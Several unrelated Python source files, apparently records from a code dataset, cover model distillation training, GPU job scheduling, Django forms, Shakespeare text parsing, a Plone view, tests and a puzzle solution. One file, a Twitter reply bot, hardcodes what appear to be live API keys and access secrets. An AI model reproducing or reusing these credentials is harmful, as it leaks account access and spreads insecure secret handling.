cfg[\"training\"][\"epochs\"], best_acc)\n\n logger.info(\"Final best accuracy: %.5f, at epoch: %d\", best_acc, best_ep)\n\n\ndef get_teacher(cfg: Dict[str, Any], num_classes: int) -> Module:\n teacher_cfg = copy.deepcopy(cfg[\"kd\"][\"teacher\"])\n teacher_name = teacher_cfg[\"name\"]\n ckpt_fp = teacher_cfg[\"checkpoint\"]\n teacher_cfg.pop(\"name\")\n teacher_cfg.pop(\"checkpoint\")\n\n # load state dict\n state_dict = torch.load(ckpt_fp, map_location=\"cpu\")[\"model\"]\n\n model_t = get_model(\n model_name=teacher_name,\n num_classes=num_classes,\n state_dict=state_dict,\n **teacher_cfg\n )\n return model_t\n\n\ndef main(\n cfg_filepath: str,\n file_name_cfg: str,\n logdir: str,\n gpu_preserve: bool = False,\n debug: bool = False\n):\n with open(cfg_filepath) as fp:\n cfg = yaml.load(fp, Loader=yaml.SafeLoader)\n\n if debug:\n cfg[\"training\"][\"num_workers\"] = 0\n cfg[\"validation\"][\"num_workers\"] = 0\n\n seed = cfg[\"training\"][\"seed\"]\n\n ckpt_dir = os.path.join(logdir, \"ckpt\")\n os.makedirs(logdir, exist_ok=True)\n os.makedirs(ckpt_dir, exist_ok=True)\n\n formatter = (\n cfg[\"kd\"][\"teacher\"][\"name\"],\n cfg[\"kd\"][\"student\"][\"name\"],\n cfg[\"kd_loss\"][\"name\"],\n cfg[\"dataset\"][\"name\"],\n )\n\n writer = SummaryWriter(\n log_dir=os.path.join(\n logdir,\n \"tf-logs\",\n file_name_cfg.format(*formatter)\n ),\n flush_secs=1\n )\n\n train_log_dir = os.path.join(logdir, \"train-logs\")\n os.makedirs(train_log_dir, exist_ok=True)\n logger = get_logger(\n level=logging.INFO,\n mode=\"w\",\n name=None,\n logger_fp=os.path.join(\n train_log_dir,\n \"training-\" + file_name_cfg.format(*formatter) + \".log\"\n )\n )\n logger.info(\"Start running with config: \\n{}\".format(yaml.dump(cfg)))\n\n # set seed\n make_deterministic(seed)\n logger.info(\"Set seed : {}\".format(seed))\n\n if gpu_preserve:\n logger.info(\"Preserving memory...\")\n preserve_memory(args.preserve_percent)\n logger.info(\"Preserving memory done\")\n\n device = 
torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # get dataloaders\n logger.info(\"Loading datasets...\")\n train_loader, val_loader, num_classes = get_dataloader(cfg)\n\n logger.info(\"num_classes: {}\".format(num_classes))\n\n # get models\n logger.info(\"Loading teacher {} and student {}...\".format(\n cfg[\"kd\"][\"teacher\"][\"name\"],cfg[\"kd\"][\"student\"][\"name\"]))\n model_t = get_teacher(cfg, num_classes).to(device)\n # model_s = get_student(cfg, num_classes).to(device)\n model_t.eval()\n # model_s.eval()\n\n model_s = LEARNTOBRANCH_Deep(\n dataset=cfg[\"dataset\"][\"name\"], \n num_attributes=cfg[\"dataset\"][\"num_classes\"],\n loss_method= cfg[\"model\"][\"loss_method\"]).to(device)\n\n branch_params_list = list(map(id, model_s.branch_2.parameters())) + list(map(id, model_s.branch_3.parameters())) + \\\n list(map(id, model_s.branch_4.parameters()))\n\n global_params = filter(lambda p: id(p) not in branch_params_list, model_s.parameters())\n branch_params = filter(lambda p: id(p) in branch_params_list, model_s.parameters())\n\n # params = [\n # {\"params\": global_params, \"lr\": cfg[\"training\"][\"lr_global\"]},\n # {\"params\": branch_params, \"lr\": cfg[\"training\"][\"lr_branch\"]},\n # ]\n\n model_s.eval()\n\n logger.info(model_s)\n\n module_dict = nn.ModuleDict(dict(\n student=model_s,\n teacher=model_t\n ))\n trainable_dict = nn.ModuleDict(dict(student=model_s))\n\n # get loss modules\n criterion_dict, loss_trainable_dict = get_loss_module(\n cfg=cfg,\n module_dict=module_dict,\n train_loader=train_loader,\n tb_writer=writer,\n device=device\n )\n trainable_dict.update(loss_trainable_dict)\n\n assert \"teacher\" not in trainable_dict.keys(), \"teacher is not trainable\"\n\n # model_s = model_s.to(device)\n # criterion = criterion.to(device)\n\n # optimizer\n # optimizer = get_optimizer(trainable_dict.parameters(), cfg[\"training\"][\"optimizer\"])\n # lr_scheduler = MultiStepLR(\n # optimizer=optimizer,\n # milestones=cfg[\"training\"][\"lr_decay_epochs\"],\n # gamma=cfg[\"training\"][\"lr_decay_rate\"]\n # )\n\n # optimizer\n # optimizer = torch.optim.Adam(params,\n # weight_decay=float(cfg[\"training\"][\"optimizer\"][\"weight_decay\"]))\n optimizer = torch.optim.SGD(\n params=global_params,\n lr=cfg[\"training\"][\"lr_stage2\"],\n weight_decay=cfg[\"training\"][\"optimizer\"][\"weight_decay_stage2\"],\n momentum=cfg[\"training\"][\"optimizer\"][\"momentum\"])\n\n checkpoint = torch.load(cfg[\"model\"][\"pretrained\"])\n # print(checkpoint.keys())\n model_s.load_state_dict(checkpoint['model'])\n logger.info(\"=> loaded checkpoint '{}'\".format(cfg[\"model\"][\"pretrained\"]))\n model_s._initialize_weights()\n\n lr_scheduler = MultiStepLR(\n optimizer=optimizer,\n milestones=cfg[\"training\"][\"lr_decay_epochs\"],\n gamma=cfg[\"training\"][\"lr_decay_rate\"]\n )\n\n logger.info(optimizer)\n\n # append teacher after optimizer to avoid weight_decay\n module_dict[\"teacher\"] = model_t.to(device)\n\n train_kd(\n cfg=cfg,\n train_loader=train_loader,\n val_loader=val_loader,\n module_dict=module_dict,\n criterion_dict=criterion_dict,\n optimizer=optimizer,\n lr_scheduler=lr_scheduler,\n tb_writer=writer,\n device=device,\n ckpt_dir=ckpt_dir\n )\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str, default = '/home/yxy/kaecode3/LTB_kd/configs/cifar-10/seed-1029/kd/ResNet50-LTB-ce.yml')\n parser.add_argument(\"--logdir\", type=str, default = '/home/yxy/kaecode3/LTB_kd/log_LTB_kd_s2')\n 
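# --- Editorial aside: main() above splits the student's parameters into global_params and branch_params by comparing Python id()s, so each group can get its own learning rate. The toy module and rates below are placeholders, not values from this script.

import torch
import torch.nn as nn

class TwoHead(nn.Module):
    def __init__(self):
        super().__init__()
        self.trunk = nn.Linear(8, 8)     # stands in for the shared backbone
        self.branch_2 = nn.Linear(8, 2)  # stands in for a branch submodule

model = TwoHead()
# ids of every parameter owned by the branch submodule(s)
branch_ids = set(map(id, model.branch_2.parameters()))
global_params = [p for p in model.parameters() if id(p) not in branch_ids]
branch_params = [p for p in model.parameters() if id(p) in branch_ids]

# one optimizer, two learning rates (placeholder values)
optimizer = torch.optim.SGD(
    [{"params": global_params, "lr": 1e-2},
     {"params": branch_params, "lr": 1e-3}],
    lr=1e-2,
    momentum=0.9,
)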
parser.add_argument(\"--file_name_cfg\", type=str,default = 'ResNet50-LTB-ce.yml')\n parser.add_argument(\"--stage\", type=str,default = 's2')\n parser.add_argument(\"--gpu_preserve\", type=str2bool, default=False)\n parser.add_argument(\"--debug\", type=str2bool, default=False)\n parser.add_argument(\"--preserve_percent\", type=float, default=0.95)\n args = parser.parse_args()\n\n __global_values__ = dict(it=0)\n main(\n cfg_filepath=args.config,\n file_name_cfg=args.file_name_cfg,\n logdir=args.logdir,\n gpu_preserve=args.gpu_preserve,\n debug=args.debug\n )\n","sub_path":"train_LTB_kd_s2.py","file_name":"train_LTB_kd_s2.py","file_ext":"py","file_size_in_byte":16943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"170698862","text":"from plumbum import local\nfrom plumbum.cmd import sed, awk, git\nimport time\nimport socket\n\n\ndef inspect_gpus(memory_threshold=500,\n gpu_util_threshold=5,\n allow_lightly_used_gpus=False,\n share_with=tuple(),\n max_nr_processes=2,\n upper_memory_threshold=3000,\n upper_gpu_util_threshold=30,\n average=1):\n \"\"\"\n Scan servers for free GPUs, print availability and return a list of free GPUs that can used to\n start jobs on them.\n Requirements:\n ~/.ssh/config needs to be set up so that connecting via `ssh ` works. Fos OSX,\n an entry can look like this:\n Host mulga\n User maxigl\n HostName mulga.cs.ox.ac.uk\n BatchMode yes\n ForwardAgent yes\n StrictHostKeyChecking no\n AddKeysToAgent yes\n UseKeychain yes\n IdentityFile ~/.ssh/id_rsa\n Args:\n verbose (bool): If True, also print who is using the GPUs\n memory_threshold (int):\n gpu_util_threshold (int): When used memory < memory_threshold and\n GPU utilisation < gpu_util_threshold,\n then the GPU is regarded as free.\n allow_lightly_used_gpus (bool):\n share_with (tuple of strings):\n upper_memory_threshold (int):\n upper_gpu_util_threshold (int): If `allow_lightly_used_gpus=True` and memory and gpu\n utilisation are under the upper thresholds and there\n is so far only one process executed on that GPU who's\n user is in in the list `share_with`, then the GPU will\n be added to the list of GPUs that can be used to start jobs.\n Return:\n free_gpus: List of dictionaries, each containing the following keys:\n 'gpu_nr': Number of the free GPU\n 'double': Whether someone is already using that GPU but it's still considered\n usuable (see `allow_lightly_used_gpus`)\n \"\"\"\n\n r_smi = local[\"nvidia_smi\"]\n r_ps = local[\"ps\"]\n averaged_gpu_data = []\n for avg_idx in range(average):\n fieldnames = ['index', 'gpu_uuid', 'memory.total', 'memory.used',\n 'utilization.gpu', 'gpu_name']\n output = r_smi(\"--query-gpu=\" + \",\".join(fieldnames),\n \"--format=csv,noheader,nounits\").replace(\" \", \"\")\n\n gpu_data = []\n for line in output.splitlines():\n gpu_data.append(dict([(name, int(x)) if x.strip().isdigit() else (name, x)\n for x, name in zip(line.split(\",\"), fieldnames)]))\n if avg_idx == 0:\n averaged_gpu_data = gpu_data\n for gpu_idx in range(len(averaged_gpu_data)):\n averaged_gpu_data[gpu_idx]['utilization.gpu'] /= average\n averaged_gpu_data[gpu_idx]['memory.used'] /= average\n else:\n for gpu_idx, data in enumerate(gpu_data):\n averaged_gpu_data[gpu_idx]['utilization.gpu'] += data['utilization.gpu'] / average\n averaged_gpu_data[gpu_idx]['memory.used'] += data['memory.used'] / average\n time.sleep(1.)\n\n gpu_data = averaged_gpu_data\n\n # Find processes and users\n for data in gpu_data:\n data['nr_processes'] = 0\n data['users'] = 
[]\n\n output = r_smi(\"--query-compute-apps=pid,gpu_uuid\",\n \"--format=csv,noheader,nounits\").replace(\" \", \"\")\n\n gpu_processes = []\n for line in output.splitlines():\n gpu_processes.append([int(x) if x.strip().isdigit() else x for x in line.split(\",\")])\n\n for process in gpu_processes:\n pid = process[0]\n user = (r_ps['-u', '-p'] | sed['-n', '2p'] | awk['{{print $1}}'])(pid)\n serial = process[1]\n for data in gpu_data:\n if data['gpu_uuid'] == serial:\n data['users'].append(user.strip())\n data['nr_processes'] += 1\n\n free_gpus = []\n\n for data in gpu_data:\n # Is it free?\n if (data['memory.used'] < memory_threshold and\n data['utilization.gpu'] < gpu_util_threshold):\n\n free_gpus.append({'gpu_nr': data['index'],\n 'occupation': 0})\n # 'session': getSession(data['index'])})\n elif (allow_lightly_used_gpus and\n data['memory.used'] < upper_memory_threshold and\n data['utilization.gpu'] < upper_gpu_util_threshold and\n data['nr_processes'] < max_nr_processes and\n data['users'][0] in share_with):\n\n free_gpus.append({'gpu_nr': data['index'],\n 'occupation': data['nr_processes']})\n\n return free_gpus\n\n\ndatasets_dims = {\n 'mnist': 28 * 28,\n 'fashion-mnist': 28 * 28,\n 'miniboone': 43,\n 'gas': 8,\n 'power': 6,\n 'hepmass': 21,\n 'bsds300': 21,\n}\n\nimport subprocess\nimport os\nimport torch\nimport itertools\n\ngpus_list = list(range(8))\nnum_gpus = len(gpus_list)\n\nfilename = 'main.py'\n\n\ndef execute_process(params, gpuid, host):\n env = os.environ.copy()\n env['CUDA_VISIBLE_DEVICES'] = str(gpuid)\n dataset, model, lr, num_flow_layers, num_ortho_vecs, num_householder, lr_schedule, experiment_name = params\n command = []\n if host == 'zizgpu04.cpu.stats.ox.ac.uk':\n command += ['taskset', '-c', '0-20', '<']\n command += ['python', filename,\n '--dataset', dataset,\n '--model', model,\n '--config', f'num_flow_layers={num_flow_layers}',\n '--config', f'num_ortho_vecs={int(num_ortho_vecs * datasets_dims[dataset])}',\n '--config', f'num_householder={int(num_householder * datasets_dims[dataset])}',\n '--config', f'lr={lr}',\n '--config', f'lr_schedule={lr_schedule}',\n '--config', f'experiment_name={experiment_name}',\n ]\n command = list(map(str, command))\n print(f\"CUDA_VISIBLE_DEVICES={str(gpuid)} {' '.join(command)}\")\n subprocess.Popen(command, env=env)\n # return\n\n\nparams_list = []\n\ndatasets = [\n # 'mnist',\n 'miniboone',\n # 'gas',\n # 'power',\n]\nmodels = [\n \"sylvester-orthogonal\",\n \"sylvester-householder\",\n \"sylvester-triangular\",\n \"sylvester-exponential\",\n \"sylvester-cayley\"\n]\nlrs = [5e-4]\n\nnum_flow_layers = [64, 128]\n\n# multiplier for the number of dimensions of the dataset\nnum_ortho_vecs = [1.]\nnum_householder = [1.]\n\nlr_schedule = ['plateau']\n\nexperiment_name = ['11_06_2']\n\nvariables_sweeped = [datasets, models, lrs[::-1], num_flow_layers, num_ortho_vecs, num_householder, lr_schedule,\n experiment_name]\n\ntries = 3\nparams_list += list(itertools.product(*variables_sweeped)) * tries\n\n# lrs = [5e-3, 2e-3, 8e-4, 5e-4, 2e-4, 8e-5, 5e-5]\n\nprint(params_list)\n\nhost = socket.gethostname()\n\nmemory_thresholds = {\n 'zizgpu01.cpu.stats.ox.ac.uk': 3000,\n 'zizgpu02.cpu.stats.ox.ac.uk': 3000,\n 'zizgpu03.cpu.stats.ox.ac.uk': 3000,\n 'zizgpu04.cpu.stats.ox.ac.uk': 3000,\n}\n\nif host == 'zizgpu04.cpu.stats.ox.ac.uk':\n disallowed_gpus = (0, 1, 2)\nelse:\n disallowed_gpus = tuple()\n\nwhile params_list:\n free_gpus = inspect_gpus(\n memory_threshold=memory_thresholds[host],\n gpu_util_threshold=95,\n average=2,\n 
share_with=('agolinsk',))\n if host == 'zizgpu04.cpu.stats.ox.ac.uk':\n free_gpus = list(filter(lambda x: x['gpu_nr'] not in (5,), free_gpus))\n free_gpus = list(filter(lambda x: x['gpu_nr'] not in disallowed_gpus, free_gpus))\n\n print()\n print(f\"Leftover params: {params_list}\")\n print()\n print(f\"Free gpus: {free_gpus}\")\n print()\n\n if free_gpus:\n params = params_list.pop()\n execute_process(params, free_gpus[0]['gpu_nr'], host)\n time.sleep(30.)\n\n# while params_list:\n# free_gpus = inspect_gpus(average=2)\n# if [i['gpu_nr'] for i in free_gpus if i['gpu_nr'] == 6]:\n# params = params_list.pop()\n# execute_process(params, 6)\n# time.sleep(30.)\n\nprint(\"Done\")\n","sub_path":"batch_training.py","file_name":"batch_training.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65841672","text":"# -*- coding:utf-8 -*-\nfrom django import forms\nfrom fried_chicken.models import Reservation, Set\nfrom django.forms.formsets import BaseFormSet, formset_factory\nfrom fried_chicken.misc import add_empty_choice\n\n\nclass CustomModelFormSet(BaseFormSet):\n def save_new(self, form, commit=True):\n \"\"\"Saves and returns a new model instance for the given form.\"\"\"\n return form.save(commit=commit)\n\n def save_new_objects(self, commit=True):\n self.new_objects = []\n for form in self.extra_forms:\n if not form.has_changed():\n continue\n # If someone has marked an add form for deletion, don't save the\n # object.\n if self.can_delete and self._should_delete_form(form):\n continue\n self.new_objects.append(self.save_new(form, commit=commit))\n if not commit:\n self.saved_forms.append(form)\n return self.new_objects\n\n def save(self, commit=True):\n \"\"\"Saves model instances for every form, adding and changing instances\n as necessary, and returns the list of instances.\n \"\"\"\n if not commit:\n self.saved_forms = []\n\n def save_m2m():\n for form in self.saved_forms:\n form.save_m2m()\n self.save_m2m = save_m2m\n return self.save_new_objects(commit)\n\n\nclass ReservationForm(forms.ModelForm):\n class Meta:\n model = Reservation\n fields = (\n \"name\",\n )\n widgets = {}\n\n def __init__(self, *args, **kwargs):\n super(ReservationForm, self).__init__(*args, **kwargs)\n\n self.fields[\"name\"].widget.attrs.update({'class': \"form-control\"})\n\n def clean(self):\n cleaned_data = super(ReservationForm, self).clean()\n for field in self.fields:\n if not cleaned_data.get(field):\n self._errors[field] = self.error_class([u\"%sを入力してください\" % self.fields[field].label])\n return cleaned_data\n\nclass SetForm(forms.ModelForm):\n sets = forms.TypedChoiceField(label=u\"セット数(4個/1セット)\",\n choices=add_empty_choice(tuple([(i, str(i)) for i in range(1, 5+1)])),\n required=False, coerce=int, empty_value=None)\n\n class Meta:\n model = Set\n fields = (\n \"topping\",\n \"sets\",\n )\n widgets = {}\n\n def __init__(self, *args, **kwargs):\n super(SetForm, self).__init__(*args, **kwargs)\n\n for field in self.fields:\n self.fields[field].widget.attrs.update({'class': \"form-control\"})\n\n def clean(self):\n cleaned_data = super(SetForm, self).clean()\n for field in self.fields:\n if not cleaned_data.get(field):\n self._errors[field] = self.error_class([u\"%sを入力してください\" % self.fields[field].label])\n return cleaned_data\n\nSetFormSet = formset_factory(SetForm, CustomModelFormSet, extra=5, 
max_num=5)","sub_path":"src/fried_chicken/customer/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"620218119","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 27 10:39:59 2014\n\n@author: ddiggins, koenigin\n\"\"\"\n\nimport re\n\nf = open('Shakespeare.txt')\nfullText = f.read() #Turns the contents of Shakespeare.txt into a readable text file\nf.close\n\n\ndef master_isolator(play, title):\n \"\"\" Does a whole lot of things!\n Inputs: Shakespeare.txt, and the title of the play Alls Well that Ends Well\n \n This function searches for the beginning and ending of the play and returns those. Then it takes the play that results,\n compiles a list of characters from the play's Dramatis Personae (because those are really the only ones that matter),\n and splits the play up in acts so we can track the sentiment of the characters in each act over time using ShakespeareSpeech.py\n \"\"\"\n #Finds the whole text of the play\n titlefinder = play.index(title.upper()) #Traverses works to find play title in text\n play = play[titlefinder:]\n end_of_play = play.index(\"THE END\") #Finds end of play\n playtext = play[:end_of_play] #Isolates the full play text\n \n \n chars_and_acts = [] \n \n \n #Isolates the Dramatis Personae of the Play\n if \"DRAMATIS PERSONAE\" in playtext:\n start_of_personae= playtext.index(\"DRAMATIS PERSONAE\") #Finds beginning of Personae\n elif \"Dramatis Personae\" in playtext:\n start_of_personae= playtext.index(\"Dramatis Personae\")\n end_of_personae = playtext.index(\"<<\") #Project Gutenberg documents end Personae with long copyright notices\n personae = playtext[start_of_personae:end_of_personae] #Isolates\n \n #Uses isolated Personae to compile a character list\n \n characters = {} #Creates empty dictionary for character names\n play = re.findall(\"[\\w'\\.\\!\\?\\-]+\", personae)#Translates dramatis personae into list of words\n for word in play:\n if word == word.upper(): #Names appear in capital letters in Personae\n if word not in characters: #Adds character if they are not yet in the dictionary\n if word != 'THE':\n if word != 'OF':\n if word != 'A': #Getting rid of common extraneous words here\n characters[word + \".\"] = []\n \n chars_and_acts.append(characters)\n \n #Isolates acts and separates them as different values of a list\n \n acts = ['I', 'II', 'III', 'IV', 'V'] #All of the plays compatible with this format have five acts\n for act in range(len(acts)):\n start_of_act = playtext.index(\"ACT \" + acts[act])\n if acts[act] == acts[-1]: #Ends function if act V is reached!\n newact = playtext[start_of_act:]\n chars_and_acts.append(newact)\n else:\n newact = playtext[start_of_act:] #Sets the new act start point\n end_of_act = newact.index(\"< None:\r\n self.descricao = \"\"\r\n self.tipo = \"\"\r\n self.cor_a_destruir = \"\"\r\n self.continentes_a_conquistar = [] # lista de objetos do tipo continente\r\n self.territorios_a_conquistar_qtd = 0\r\n self.tropas_em_cada_territorios = 0\r\n\r\n def __eq__(self, other) -> bool:\r\n return self.descricao == other.descricao\r\n","sub_path":"WAR/jogo/Objetivo.py","file_name":"Objetivo.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"145920492","text":"################################################################\n# pp.client-plone\n# (C) 2013, ZOPYX Limited, D-72074 Tuebingen, 
Germany\n################################################################\n\nfrom Products.Five.browser import BrowserView\nfrom Products.ATContentTypes.interface.folder import IATFolder\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFCore.WorkflowCore import WorkflowException\n\ntry:\n from plone.dexterity.interfaces import IDexterityContainer\n HAVE_DEXTERITY = True\nexcept ImportError:\n HAVE_DEXTERITY = False\n\nfrom ...logger import LOG\nfrom ...interfaces import IPPContent, IArchiveFolder\n\ndef _c(s):\n if not isinstance(s, unicode):\n s = unicode(s, 'utf-8', 'ignore')\n return s.encode('utf-8')\n\nclass FlatHTMLView(BrowserView):\n \"\"\" A HTML collector for a Plone folder containing Document instances \"\"\"\n\n def collect(self, published_only=False, filter_uids=[]):\n \"\"\" A collector taking only flat contents into account for the\n conversion.\n \"\"\"\n\n def collect_objects(folder, level=0, items=[]):\n \"\"\" Collect all related subobjects \"\"\"\n for brain in folder.getFolderContents({'sort_on' : 'getObjPositionInParent'}):\n obj = brain.getObject()\n\n if IPPContent.providedBy(obj):\n items.append(dict(obj=obj, level=level))\n else:\n LOG.warn('IPPContent not provided by %s' % obj.absolute_url(1))\n\n if HAVE_DEXTERITY:\n if (IATFolder.providedBy(obj) or IDexterityContainer.providedBy(obj)) and not IArchiveFolder.providedBy(obj):\n collect_objects(obj, level+1, items)\n else:\n if IATFolder.providedBy(obj) and not IArchiveFolder.providedBy(obj):\n collect_objects(obj, level+1, items)\n\n utils = getToolByName(self.context, 'plone_utils')\n wf_tool = getToolByName(self.context, 'portal_workflow')\n\n html = list()\n collected_objs = list()\n collect_objects(self.context, 0, collected_objs)\n for d in collected_objs:\n level = d['level']\n obj = d['obj']\n if filter_uids and not d['obj'].UID() in filter_uids:\n LOG.info('Filtered: %s' % obj.absolute_url(1))\n continue\n LOG.info('Introspecting %s' % obj.absolute_url(1))\n view = obj.restrictedTraverse('@@asHTML', None)\n if view is not None:\n pt = utils.normalizeString(obj.portal_type)\n review_state = wf_tool.getInfoFor(obj, 'review_state')\n if published_only and review_state not in ['published']:\n continue\n html.append('
\\n' % \n (level, pt, review_state, obj.absolute_url(1), obj.getId(), obj.getId(), review_state, level, obj.UID()))\n html.append('
')\n html.append('' % obj.absolute_url())\n try:\n html.append('
%s
' % wf_tool.getInfoFor(obj, 'review_state'))\n except WorkflowException:\n pass\n html.append('
')\n html.append(view())\n html.append('
')\n else :\n LOG.warn('No @@asHTML view found for %s' % obj.absolute_url(1))\n\n return '\\n'.join(html)\n\n def __call__(self, published_only=False, filter_uids=[]):\n \"\"\" Collector for folderish content \"\"\"\n return self.collect(published_only=published_only, filter_uids=filter_uids)\n","sub_path":"pp/client/plone/browser/types/folder_flat.py","file_name":"folder_flat.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"405899946","text":"\nimport time\nimport tweepy\nprint(\"this is my tweeter bot\")\n\nCONSUMER_KEY=\"sYdoG1wzZqE6qvxZBejWNh1n2\"\nCONSUMER_SECRET= \"MH22PoAvRXnBHQPhVJCdBNUEVVE1zFMtpPxHJDDn4fXBRO7h14\"\nACCESS_KEY=\"1095324898384326656-f8JT063hg1gCHlyFk4nyw4sjrMj8zP\"\nACCESS_SECRET=\"4DOVRfZL2iLY0hHUVRhBaRTqNtWwnVPNpXmkkJFyZdUOW\"\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\napi = tweepy.API(auth)\n\nFILE_NAME = 'last_seen_id.txt'\n\ndef retrieve_last_seen_id(file_name):\n f_read = open(file_name, 'r')\n last_seen_id = int(f_read.read().strip())\n f_read.close()\n return last_seen_id\n\ndef store_last_seen_id(last_seen_id, file_name):\n f_write = open(file_name, 'w')\n f_write.write(str(last_seen_id))\n f_write.close()\n return\ndef reply_to_tweets():\n print('replying to tweets...', flush=True)\n # DEV NOTE: use 1060651988453654528 for testing.\n last_seen_id = retrieve_last_seen_id(FILE_NAME)\n # NOTE: We need to use tweet_mode='extended' below to show\n # all full tweets (with full_text). Without it, long tweets\n # would be cut off.\n mentions = api.mentions_timeline(\n last_seen_id,\n tweet_mode='extended')\n for mention in reversed(mentions):\n print(str(mention.id) + ' - ' + mention.full_text, flush=True)\n last_seen_id = mention.id\n store_last_seen_id(last_seen_id, FILE_NAME)\n if '#helloworld' in mention.full_text.lower():\n print('found #helloworld!', flush=True)\n print('responding back...', flush=True)\n api.update_status('@' + mention.user.screen_name +\n '...HI...', mention.id)\n\nwhile True:\n reply_to_tweets()\n time.sleep(15)","sub_path":"my_tweeter.py","file_name":"my_tweeter.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"94172985","text":"from Paragraphs.FocusParagraph import FocusParagraph\nimport pytest\n\n\n@pytest.allure.feature('Paragraphs')\n@pytest.allure.story('Focus paragraph')\n@pytest.mark.usefixtures('init_solution_page')\nclass TestFocusParagraph:\n\n @pytest.allure.title('VDM-1192 Focus paragraph - creation')\n def test_focus_creating(self):\n self.node.fill_solution_page_mandatory()\n self.node.add_paragraph('focus')\n focus_paragraph = FocusParagraph(self.driver)\n focus_paragraph.fill_focus_paragraph_mandatory()\n url = self.driver.current_url\n self.node.save_node()\n assert self.driver.current_url != url\n assert (focus_paragraph.test_data['description'] in self.driver.page_source)\n self.node.delete_node()\n\n @pytest.allure.title('VDM-1192 Focus paragraph - creation with all fields')\n def test_focus_creating_all_fields(self):\n self.node.fill_solution_page_mandatory()\n self.node.add_paragraph('focus')\n focus_paragraph = FocusParagraph(self.driver)\n focus_paragraph.fill_focus_paragraph()\n url = self.driver.current_url\n self.node.save_node()\n assert self.driver.current_url != url\n assert (focus_paragraph.test_data['title'] in self.driver.page_source)\n 
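# --- Editorial aside: these FocusParagraph tests follow the page-object pattern, where the test talks only to a wrapper class and the raw Selenium lookups live behind it. The sketch below shows the shape of such a wrapper; the locator strings and method bodies are invented for illustration, not taken from Paragraphs.FocusParagraph.

from selenium.webdriver.common.by import By

class FocusParagraphSketch:
    """Illustrative stand-in for Paragraphs.FocusParagraph; all selectors are hypothetical."""
    def __init__(self, driver):
        self.driver = driver
        self.test_data = {"title": "a title", "description": "a description"}

    def get_focus_title(self):
        # hypothetical selector -- the real one lives in the actual page object
        return self.driver.find_element(By.CSS_SELECTOR, "[name*='focus-title']")

    def fill_focus_paragraph_mandatory(self):
        # tests stay free of CSS details: one locator method per field
        self.get_focus_title().send_keys(self.test_data["title"])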
assert (focus_paragraph.test_data['description'] in self.driver.page_source)\n assert (focus_paragraph.test_data['background'] in self.driver.page_source)\n assert (focus_paragraph.test_data['colour'] in self.driver.page_source)\n self.node.delete_node()\n\n @pytest.allure.title('VDM-1193 Focus paragraph - empty fields validation')\n def test_focus_empty_fields_validation(self):\n self.node.fill_solution_page_mandatory()\n self.node.add_paragraph('focus')\n focus_paragraph = FocusParagraph(self.driver)\n focus_paragraph.get_focus_title()\n url = self.driver.current_url\n self.node.save_node()\n assert self.driver.current_url == url\n assert self.node.get_error_msg()\n\n @pytest.allure.title('VDM-1194 Focus paragraph - check fields existing')\n def test_focus_fields_existing(self):\n self.node.add_paragraph('focus')\n focus_paragraph = FocusParagraph(self.driver)\n assert focus_paragraph.get_focus_title().is_displayed()\n assert focus_paragraph.get_description().is_displayed()\n assert focus_paragraph.get_colour().first_selected_option\n assert focus_paragraph.get_background().first_selected_option\n","sub_path":"test_paragraphs/test_focus.py","file_name":"test_focus.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"30791997","text":"# !/Python34\n# Copyright 2015 Tim Murphy. All rights reserved.\n\n## HackerRank\n# Algorithms - Implementation - ACM ICPC Team\n# https://www.hackerrank.com/challenges/acm-icpc-team\n\n'''\nProblem:\n\nYou are given a list of N people who are attending ACM-ICPC \nWorld Finals. Each of them are either well versed in a topic or \nthey are not. Find out the maximum number of topics a 2-person \nteam can know. And also find out how many teams can know that maximum \nnumber of topics.\n\nNote Suppose a, b, and c are three different people, then (a,b) \nand (b,c) are counted as two different teams.\n\n\nInput:\n\nThe first line contains two integers, N and M, separated by a single \nspace, where N represents the number of people, and M represents the \nnumber of topics. N lines follow.\n\nEach line contains a binary string of length M. If the ith line's jth \ncharacter is 1, then the ith person knows the jth topic; \notherwise, he doesn't know the topic.\n\n\nConstraints:\n\n2 <= N <= 500 \n1 <= M <= 500\n\n\nOutput:\n\nOn the first line, print the maximum number of topics a 2-person team can know. \nOn the second line, print the number of 2-person teams that can know the \nmaximum number of topics.\n\n'''\n\n# Get n and m from user, initialize a list to store the skills of each member\nn, m = map(int, input().split())\nskills = []\n\n# Skills are represented as a binary string\nfor i in range(n):\n skills += [ int(input(), 2) ]\n\n# Initialize result trackers\nbestscore = 0\nbestteams = 0\n \n# Count the skills in each team of two players. If it's the highest number of skills,\n# Record it and set the number of teams with that score to 1. 
